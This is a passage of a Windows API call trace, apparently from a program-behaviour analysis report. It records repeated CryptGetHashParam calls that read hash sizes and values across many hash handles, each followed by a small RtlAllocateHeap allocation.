hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7a6a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7a6a0, pdwDataLen=0xce51c) returned 1 [0188.085] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7b990 [0188.085] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7b990, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7b990, pdwDataLen=0xce51c) returned 1 [0188.085] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bba0 [0188.085] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7bba0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bba0, pdwDataLen=0xce51c) returned 1 [0188.085] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7be10 [0188.085] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7be10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7be10, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c230 [0188.086] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e7c230, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c230, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bfc0 [0188.086] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e7bfc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bfc0, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7b9c0 [0188.086] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7b9c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7b9c0, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c1a0 [0188.086] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e7c1a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c1a0, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c260 [0188.086] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7c260, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c260, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bd80 [0188.086] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7bd80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bd80, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bff0 [0188.086] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7bff0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bff0, pdwDataLen=0xce51c) returned 1 [0188.086] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7b9f0 [0188.087] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7b9f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7b9f0, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c290 [0188.087] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e7c290, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c290, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bb10 [0188.087] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e7bb10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bb10, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ba20 [0188.087] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e7ba20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ba20, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c020 [0188.087] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e7c020, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c020, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ba80 [0188.087] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7ba80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ba80, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bbd0 [0188.087] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7bbd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bbd0, pdwDataLen=0xce51c) returned 1 [0188.087] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bf30 [0188.088] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7bf30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bf30, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bc30 [0188.088] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7bc30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bc30, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bc60 [0188.088] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7bc60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bc60, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bea0 [0188.088] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e7bea0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bea0, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c0b0 [0188.088] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e7c0b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c0b0, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c0e0 [0188.088] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c0e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c0e0, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c2f0 [0188.088] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e7c2f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c2f0, pdwDataLen=0xce51c) returned 1 [0188.088] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bcc0 [0188.088] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e7bcc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bcc0, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bab0 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7bab0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bab0, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bcf0 [0188.089] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e7bcf0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bcf0, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c350 [0188.089] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e7c350, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c350, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7b780 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7b780, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7b780, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bd20 [0188.089] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e7bd20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bd20, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bd50 [0188.089] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7bd50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bd50, pdwDataLen=0xce51c) returned 1 [0188.089] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bdb0 [0188.089] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e7bdb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bdb0, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7bde0 [0188.090] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7bde0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7bde0, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7b7b0 [0188.090] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7b7b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7b7b0, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7be40 [0188.090] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e7be40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7be40, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c950 [0188.090] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7c950, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c950, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c410 [0188.090] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7c410, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c410, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cd40 [0188.090] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e7cd40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cd40, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cec0 [0188.090] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e7cec0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cec0, pdwDataLen=0xce51c) returned 1 [0188.090] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c8f0 [0188.091] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e7c8f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c8f0, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c530 [0188.091] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7c530, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c530, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cbf0 [0188.091] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7cbf0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cbf0, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c5c0 [0188.091] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7c5c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c5c0, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cf50 [0188.091] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e7cf50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cf50, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ccb0 [0188.091] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7ccb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ccb0, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cce0 [0188.091] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7cce0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cce0, pdwDataLen=0xce51c) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c740 [0188.091] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c740, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c740, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c440 [0188.092] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e7c440, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c440, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c470 [0188.092] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7c470, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c470, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c800 [0188.092] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7c800, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c800, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c560 [0188.092] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7c560, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c560, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ca10 [0188.092] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7ca10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ca10, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c620 [0188.092] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e7c620, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c620, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c4a0 [0188.092] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e7c4a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c4a0, pdwDataLen=0xce51c) returned 1 [0188.092] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cf20 